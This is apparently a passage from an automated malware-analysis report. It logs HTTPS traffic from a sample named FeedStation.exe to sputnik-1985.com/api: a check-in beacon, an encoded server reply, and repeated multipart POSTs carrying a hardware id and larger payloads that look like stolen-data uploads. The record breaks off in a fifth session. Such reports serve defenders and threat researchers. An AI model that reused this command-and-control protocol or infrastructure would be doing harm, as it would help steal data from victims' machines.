                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:16 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=lf4gbgrs5bm6vv8c6srftmvtr6; expires=Tue, 06 May 2025 04:45:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UylMZJTlfAib29FLQiqI5qQvLLEjiuN539nVzEQjj%2Fjq1%2FdOx351NOjq650SE44YXoqf11Nsgn5veFg30YLH%2FBzp5sVdBz2YZSKtLi01wz5frLgWMQWTHuqeab0%2BGFkMhs%2FJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc281bfb910f5b-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1683&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1705607&cwnd=221&unsent_bytes=0&cid=a4565ee3d958a2c4&ts=461&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC244INData Raw: 34 33 30 63 0d 0a 72 70 50 44 39 69 4d 77 75 33 65 4e 44 69 59 67 36 71 35 71 6b 4c 33 75 6e 54 56 32 5a 2b 4f 6b 41 4c 68 6f 49 6e 6b 30 4f 6c 76 56 73 62 58 55 47 51 53 58 56 66 35 72 42 42 71 4d 7a 77 62 6a 32 4d 4b 2f 56 42 4a 46 32 63 4a 68 31 42 74 48 56 52 5a 4d 4e 6f 79 70 70 5a 64 50 51 39 35 62 72 32 74 65 41 74 44 31 45 62 4c 59 67 4c 38 50 56 41 4b 4a 78 6d 48 55 43 6b 4d 53 57 30 6f 33 7a 66 75 76 6b 55 74 56 32 42 50 73 59 6b 74 46 6a 38 73 4c 2b 74 4f 48 38 46 30 62 52 63 2b 47 5a 63 4a 4b 47 46 74 35 58 79 2f 50 33 71 4b 46 53 42 4c 47 57 2f 59 73 51 30 37 49 6c 45 6a 78 32 49 7a 78 55 78 49 4d 69 38 78 6f 33 41 74 47 45 30 52 54 50 63 62 37 6f 5a 4a 4b 58 39 45 48 34 57 68 4d 54 6f 6e 42 43 37 4b 52 7a 50
                                                                                                                                                                                                                          Data Ascii: 430crpPD9iMwu3eNDiYg6q5qkL3unTV2Z+OkALhoInk0OlvVsbXUGQSXVf5rBBqMzwbj2MK/VBJF2cJh1BtHVRZMNoyppZdPQ95br2teAtD1EbLYgL8PVAKJxmHUCkMSW0o3zfuvkUtV2BPsYktFj8sL+tOH8F0bRc+GZcJKGFt5Xy/P3qKFSBLGW/YsQ07IlEjx2IzxUxIMi8xo3AtGE0RTPcb7oZJKX9EH4WhMTonBC7KRzP
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 68 50 56 46 33 42 6c 56 44 5a 47 31 45 4f 57 30 67 2f 6a 4f 37 76 6a 51 46 56 31 56 57 33 4c 45 78 4f 68 73 6b 4c 2f 64 69 4e 2f 30 55 62 42 59 4c 4f 61 74 34 41 54 78 52 5a 56 6a 50 4c 2b 61 69 54 54 6c 58 52 45 2b 42 76 42 41 7a 49 79 78 43 79 68 38 7a 66 52 78 63 47 6c 63 74 7a 6d 68 55 4f 41 68 5a 66 4e 59 79 70 34 5a 4a 50 55 39 51 56 2f 57 52 50 53 59 33 65 41 2f 76 53 67 66 39 61 48 67 71 43 78 6d 58 51 41 45 38 52 55 6c 55 30 79 76 47 68 31 41 38 53 33 67 32 76 4e 41 52 68 6a 64 77 50 2f 73 6e 4f 78 52 63 4c 53 35 69 47 5a 64 5a 4b 47 46 74 65 58 54 72 50 2b 71 36 58 53 56 6e 4c 46 66 31 71 53 55 65 61 79 67 33 38 31 59 2f 74 58 52 6f 44 67 73 39 70 30 77 39 48 48 78 59 57 65 63 76 70 34 63 77 42 63 39 51 65 34 32 5a 54 51 73 6a 54 52 75 75 66 69
                                                                                                                                                                                                                          Data Ascii: hPVF3BlVDZG1EOW0g/jO7vjQFV1VW3LExOhskL/diN/0UbBYLOat4ATxRZVjPL+aiTTlXRE+BvBAzIyxCyh8zfRxcGlctzmhUOAhZfNYyp4ZJPU9QV/WRPSY3eA/vSgf9aHgqCxmXQAE8RUlU0yvGh1A8S3g2vNARhjdwP/snOxRcLS5iGZdZKGFteXTrP+q6XSVnLFf1qSUeayg381Y/tXRoDgs9p0w9HHxYWecvp4cwBc9Qe42ZTQsjTRuufi
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 41 67 4d 78 6f 6d 6b 51 41 48 45 34 59 59 59 7a 41 74 70 38 44 5a 39 6f 62 34 57 74 53 41 70 65 43 45 62 4c 59 67 4c 38 50 56 41 69 4a 77 32 66 56 43 30 6f 56 55 31 49 31 78 50 2b 69 68 6b 35 57 32 52 6e 6e 5a 6b 6c 4d 6a 4d 51 42 2b 64 53 4b 2f 31 59 65 52 63 2b 47 5a 63 4a 4b 47 46 74 69 58 7a 58 42 2f 75 4f 68 51 6c 7a 58 45 76 6b 73 57 77 79 52 6a 41 2f 2b 6e 39 53 2f 57 78 30 46 69 73 78 6d 32 67 31 4e 48 6c 56 66 4f 73 48 32 71 35 70 47 56 74 55 63 34 6d 70 45 52 59 7a 4a 47 76 66 57 67 50 4d 58 57 6b 57 47 33 69 4b 43 53 6d 38 63 51 46 73 57 7a 2b 43 6f 31 46 34 63 77 46 58 6f 59 41 51 61 79 4d 73 4e 2b 74 53 4b 39 31 63 47 41 49 2f 4e 59 39 41 4d 51 52 5a 61 58 6a 6e 4e 38 61 65 59 51 56 58 65 42 2f 31 70 51 6c 43 43 6a 45 61 79 32 4a 53 2f 44 31
                                                                                                                                                                                                                          Data Ascii: AgMxomkQAHE4YYYzAtp8DZ9ob4WtSApeCEbLYgL8PVAiJw2fVC0oVU1I1xP+ihk5W2RnnZklMjMQB+dSK/1YeRc+GZcJKGFtiXzXB/uOhQlzXEvksWwyRjA/+n9S/Wx0Fisxm2g1NHlVfOsH2q5pGVtUc4mpERYzJGvfWgPMXWkWG3iKCSm8cQFsWz+Co1F4cwFXoYAQayMsN+tSK91cGAI/NY9AMQRZaXjnN8aeYQVXeB/1pQlCCjEay2JS/D1
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 4f 70 6f 4a 54 78 4a 5a 55 44 48 44 2f 71 57 61 52 31 54 55 45 4f 42 6d 56 6b 71 47 77 51 50 39 31 4a 37 2f 57 68 41 4a 68 63 35 70 30 45 6f 4f 57 31 46 41 65 5a 53 78 6c 4a 6c 4f 55 74 6f 44 72 33 4d 4b 57 38 6a 4c 42 4c 4b 48 7a 50 4e 5a 46 41 71 4e 79 6d 6e 53 43 30 77 56 55 56 30 77 78 50 6d 7a 6c 55 56 61 32 42 76 67 62 55 42 48 6a 63 67 50 39 74 6d 44 76 78 6c 55 41 70 6d 47 4f 70 6f 6c 5a 79 34 55 65 51 4f 4d 37 75 2b 4e 41 56 58 56 56 62 63 73 53 45 47 45 78 41 66 30 31 6f 44 31 58 68 38 4a 69 73 4a 75 30 77 39 47 47 6c 4e 64 4f 4d 6a 39 71 35 4a 43 55 64 59 61 34 47 51 45 44 4d 6a 4c 45 4c 4b 48 7a 4e 70 41 48 77 75 48 68 6e 32 55 45 77 41 63 57 68 68 68 6a 50 32 6f 6b 6b 64 58 31 52 54 70 5a 45 46 4b 6a 4d 30 4f 39 4e 79 44 2b 31 49 56 43 6f 58
                                                                                                                                                                                                                          Data Ascii: OpoJTxJZUDHD/qWaR1TUEOBmVkqGwQP91J7/WhAJhc5p0EoOW1FAeZSxlJlOUtoDr3MKW8jLBLKHzPNZFAqNymnSC0wVUV0wxPmzlUVa2BvgbUBHjcgP9tmDvxlUApmGOpolZy4UeQOM7u+NAVXVVbcsSEGExAf01oD1Xh8JisJu0w9GGlNdOMj9q5JCUdYa4GQEDMjLELKHzNpAHwuHhn2UEwAcWhhhjP2okkdX1RTpZEFKjM0O9NyD+1IVCoX
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 56 49 61 57 31 4d 72 79 2f 36 6c 6b 30 31 55 31 68 50 75 61 55 35 4f 6a 38 6b 44 2f 64 50 4d 73 52 63 54 48 63 47 65 49 76 51 42 55 77 78 56 56 6a 4c 61 36 75 47 4c 44 30 75 5a 45 75 4d 73 48 41 4b 4c 78 77 50 32 33 34 44 2f 55 78 6b 46 6b 38 6c 6c 33 51 4e 4c 43 56 78 66 50 73 66 35 71 70 74 48 51 4e 55 62 2f 57 6c 57 55 4d 69 43 53 50 58 48 7a 4b 63 58 49 67 4b 52 31 6d 47 59 4f 31 59 59 51 46 4d 30 77 4c 47 2b 32 6c 67 53 33 68 6d 76 4e 41 52 45 68 38 55 4c 2f 64 36 46 38 31 6f 52 44 49 54 48 5a 4e 34 41 53 68 74 51 58 6a 6a 4a 2b 36 4b 56 53 31 76 65 48 65 68 76 56 67 4c 47 6a 41 2f 71 6e 39 53 2f 66 68 4d 58 6a 39 59 69 78 55 52 5a 57 31 46 55 65 5a 53 78 70 5a 35 4f 56 74 34 5a 36 57 6c 43 54 34 6e 44 43 66 4c 51 69 50 52 65 45 67 53 4d 77 32 2f 65
                                                                                                                                                                                                                          Data Ascii: VIaW1Mry/6lk01U1hPuaU5Oj8kD/dPMsRcTHcGeIvQBUwxVVjLa6uGLD0uZEuMsHAKLxwP234D/UxkFk8ll3QNLCVxfPsf5qptHQNUb/WlWUMiCSPXHzKcXIgKR1mGYO1YYQFM0wLG+2lgS3hmvNAREh8UL/d6F81oRDITHZN4AShtQXjjJ+6KVS1veHehvVgLGjA/qn9S/fhMXj9YixURZW1FUeZSxpZ5OVt4Z6WlCT4nDCfLQiPReEgSMw2/e
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 6f 59 59 59 7a 78 71 35 46 4c 58 39 6f 61 37 48 35 46 52 4a 72 4d 42 66 6a 4e 68 76 52 53 47 51 69 4d 78 57 54 63 41 55 77 4a 58 31 67 36 78 37 48 76 31 45 5a 4b 6d 55 32 76 54 31 4e 55 67 73 73 45 35 4e 53 4e 2f 45 45 5a 46 63 47 49 49 73 73 4e 55 56 73 4f 54 69 6e 62 39 72 37 61 57 42 4c 65 47 61 38 30 42 45 53 42 79 67 2f 30 30 5a 37 36 55 52 73 4b 69 4d 39 6d 30 67 6c 41 48 31 4a 66 50 4d 2f 39 71 70 4e 43 58 64 30 63 34 57 56 4c 41 73 61 4d 44 2b 71 66 31 4c 39 32 44 77 61 4e 79 79 4c 46 52 46 6c 62 55 56 52 35 6c 4c 47 74 6d 6b 52 53 30 78 50 72 61 55 4a 49 6a 63 77 44 38 64 43 49 2b 56 4d 62 42 59 72 50 59 39 77 50 53 68 42 51 56 54 72 4b 39 2b 48 61 41 56 58 42 56 62 63 73 5a 46 6d 46 77 41 2b 79 77 4d 4c 6d 46 78 4d 4a 77 5a 34 69 30 51 5a 45 48
                                                                                                                                                                                                                          Data Ascii: oYYYzxq5FLX9oa7H5FRJrMBfjNhvRSGQiMxWTcAUwJX1g6x7Hv1EZKmU2vT1NUgssE5NSN/EEZFcGIIssNUVsOTinb9r7aWBLeGa80BESByg/00Z76URsKiM9m0glAH1JfPM/9qpNCXd0c4WVLAsaMD+qf1L92DwaNyyLFRFlbUVR5lLGtmkRS0xPraUJIjcwD8dCI+VMbBYrPY9wPShBQVTrK9+HaAVXBVbcsZFmFwA+ywMLmFxMJwZ4i0QZEH
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 31 73 61 69 54 57 6b 50 50 47 50 39 72 42 48 33 47 6a 42 43 79 68 38 7a 4b 56 42 6f 4c 68 74 42 7a 6c 79 31 57 45 56 46 49 50 74 76 2b 34 64 6f 42 56 4a 6c 4e 76 43 49 45 52 70 6d 4d 55 4b 4b 4e 31 36 6f 45 51 31 58 54 32 53 7a 44 53 6c 5a 62 44 67 70 33 6a 4f 50 68 7a 41 45 56 32 67 66 39 61 6b 64 55 69 34 73 32 7a 50 69 57 38 6c 45 44 46 4c 2f 34 5a 63 41 48 52 67 78 48 46 43 7a 50 2f 36 2b 54 56 78 4b 58 56 65 41 73 48 48 76 49 68 45 6a 4e 6b 63 7a 6e 46 30 78 46 74 4d 56 73 31 41 31 57 43 68 74 2f 49 38 48 33 74 6f 55 42 48 4a 6b 54 72 7a 51 55 44 4d 6a 49 47 62 4b 48 33 4b 30 4d 51 56 62 57 6c 6a 44 46 52 46 6c 62 51 42 68 68 6e 72 2f 68 68 67 45 4b 6d 56 4c 73 66 6c 5a 45 69 39 6f 4c 74 65 47 79 30 56 41 53 41 49 62 57 49 50 51 42 56 42 77 57 46 6e
                                                                                                                                                                                                                          Data Ascii: 1saiTWkPPGP9rBH3GjBCyh8zKVBoLhtBzly1WEVFIPtv+4doBVJlNvCIERpmMUKKN16oEQ1XT2SzDSlZbDgp3jOPhzAEV2gf9akdUi4s2zPiW8lEDFL/4ZcAHRgxHFCzP/6+TVxKXVeAsHHvIhEjNkcznF0xFtMVs1A1WCht/I8H3toUBHJkTrzQUDMjIGbKH3K0MQVbWljDFRFlbQBhhnr/hhgEKmVLsflZEi9oLteGy0VASAIbWIPQBVBwWFn
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 67 30 34 53 6c 31 58 70 4c 42 77 51 78 6f 77 4d 34 35 2f 55 72 77 56 50 55 4e 4b 52 4d 6f 67 56 44 67 49 57 54 6e 6d 55 6f 2b 2f 55 55 78 4b 42 56 61 68 76 56 6c 43 4f 7a 78 37 78 6d 4c 4c 42 63 42 6f 43 67 4e 42 79 7a 51 55 50 4e 57 42 35 42 2f 4c 6b 6f 70 70 50 56 63 38 45 72 79 49 45 54 63 69 55 4d 62 4b 58 7a 4d 41 5a 56 42 33 42 6e 69 4c 76 43 55 34 56 55 55 34 6f 67 64 61 76 6b 30 42 45 79 51 4c 67 49 32 70 30 71 59 78 47 73 74 6e 4d 70 77 56 61 52 59 58 58 49 6f 4a 61 45 6b 41 44 43 32 36 63 6f 37 37 61 57 42 4c 50 56 62 63 2b 43 67 4b 61 6a 46 43 79 6d 49 2f 74 52 52 49 47 6c 38 55 6c 35 44 52 6e 46 56 46 5a 4c 39 7a 38 72 62 56 43 51 39 4d 72 30 58 6c 48 54 49 62 4c 48 75 4f 66 77 72 39 59 56 46 32 34 68 69 71 61 4e 51 35 62 54 68 68 68 6a 4d 53
                                                                                                                                                                                                                          Data Ascii: g04Sl1XpLBwQxowM45/UrwVPUNKRMogVDgIWTnmUo+/UUxKBVahvVlCOzx7xmLLBcBoCgNByzQUPNWB5B/LkoppPVc8EryIETciUMbKXzMAZVB3BniLvCU4VUU4ogdavk0BEyQLgI2p0qYxGstnMpwVaRYXXIoJaEkADC26co77aWBLPVbc+CgKajFCymI/tRRIGl8Ul5DRnFVFZL9z8rbVCQ9Mr0XlHTIbLHuOfwr9YVF24hiqaNQ5bThhhjMS
                                                                                                                                                                                                                          2025-01-10 10:59:16 UTC1369INData Raw: 39 30 44 2b 6d 39 55 52 62 62 79 4a 65 44 59 6e 50 77 56 4f 41 4b 4d 79 6c 7a 6b 50 56 45 63 52 68 6f 66 7a 2b 65 69 31 41 38 53 77 56 57 33 4c 47 6c 51 6a 39 77 4c 73 50 4f 4c 38 6c 74 55 47 73 2f 66 49 73 78 4b 47 45 67 59 47 43 75 4d 71 65 48 54 51 6b 44 4c 45 2b 78 36 52 77 57 32 38 69 58 67 32 4a 7a 38 46 53 55 49 68 64 42 33 32 52 70 48 4a 57 68 31 4b 38 76 68 6f 74 5a 6b 61 4a 73 6b 2b 57 39 45 54 49 2b 4d 52 72 4c 48 7a 4b 63 58 4f 52 65 47 31 6d 47 59 4c 33 70 5a 5a 30 34 36 7a 50 2b 6d 31 41 38 53 31 56 57 33 4c 45 6c 51 6a 39 77 4c 76 74 69 57 2b 42 63 4c 53 35 69 47 64 4a 70 53 45 31 55 57 53 6e 6d 55 73 65 61 61 54 46 50 61 47 2b 78 2b 56 6b 53 4c 32 67 75 31 34 62 4c 51 58 42 55 56 6a 4e 64 76 33 68 78 2b 4a 58 46 65 50 4d 76 50 6e 36 4e 51
                                                                                                                                                                                                                          Data Ascii: 90D+m9URbbyJeDYnPwVOAKMylzkPVEcRhofz+ei1A8SwVW3LGlQj9wLsPOL8ltUGs/fIsxKGEgYGCuMqeHTQkDLE+x6RwW28iXg2Jz8FSUIhdB32RpHJWh1K8vhotZkaJsk+W9ETI+MRrLHzKcXOReG1mGYL3pZZ046zP+m1A8S1VW3LElQj9wLvtiW+BcLS5iGdJpSE1UWSnmUseaaTFPaG+x+VkSL2gu14bLQXBUVjNdv3hx+JXFePMvPn6NQ


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.549801104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:17 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=4PJXJRFRQIXUO72KPW
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 12842
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:17 UTC12842OUTData Raw: 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66
                                                                                                                                                                                                                          Data Ascii: --4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="pid"2--4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="lid"HpOoIh--3fe7f
                                                                                                                                                                                                                          2025-01-10 10:59:18 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:18 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=7aup5lo3ets89kjgkg8p1a3ium; expires=Tue, 06 May 2025 04:45:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgPChXca9txS%2BO26OAmKdM9FEvzTBE4n5CWb2HgZs07uu3MnzIH5DTGs2LpD7a2mWwylCuM41Oeh0uqRye9wMUTuRSU%2BgHqPOeSv8ZguxV9KdU%2Fbt3uuTPICegK9hz370wX1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc28233c10424b-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1686&rtt_var=635&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13782&delivery_rate=1719670&cwnd=248&unsent_bytes=0&cid=0664be8af27a93d6&ts=526&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-10 10:59:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.549807104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:18 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=3E7H6T7CJBZE
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 15048
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:18 UTC15048OUTData Raw: 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 45 37 48 36 54 37 43 4a 42 5a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 33 45 37 48 36 54 37
                                                                                                                                                                                                                          Data Ascii: --3E7H6T7CJBZEContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--3E7H6T7CJBZEContent-Disposition: form-data; name="pid"2--3E7H6T7CJBZEContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--3E7H6T7
                                                                                                                                                                                                                          2025-01-10 10:59:19 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:19 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=rkckn79162ovkq9ei90mppm1qe; expires=Tue, 06 May 2025 04:45:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npREztTnzyUxewpqQ1LyW7MCrWDcl2VFHPI%2BAY7FqjX%2FBKvj9KFLrGl3rrQ14raJIVFsETPwAb%2BLciEYXYZc4e4w2IoMImBeBVEp%2BY3M%2BIeSqnkDf6NTxqibvUDpteOKlYui"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc282a9954729f-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1944&rtt_var=739&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15982&delivery_rate=1471774&cwnd=169&unsent_bytes=0&cid=03e1654e950bb321&ts=516&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-10 10:59:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.549819104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=8C5WVK0D5HPZHE5XL
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 20568
                                                                                                                                                                                                                          Host: sputnik-1985.com
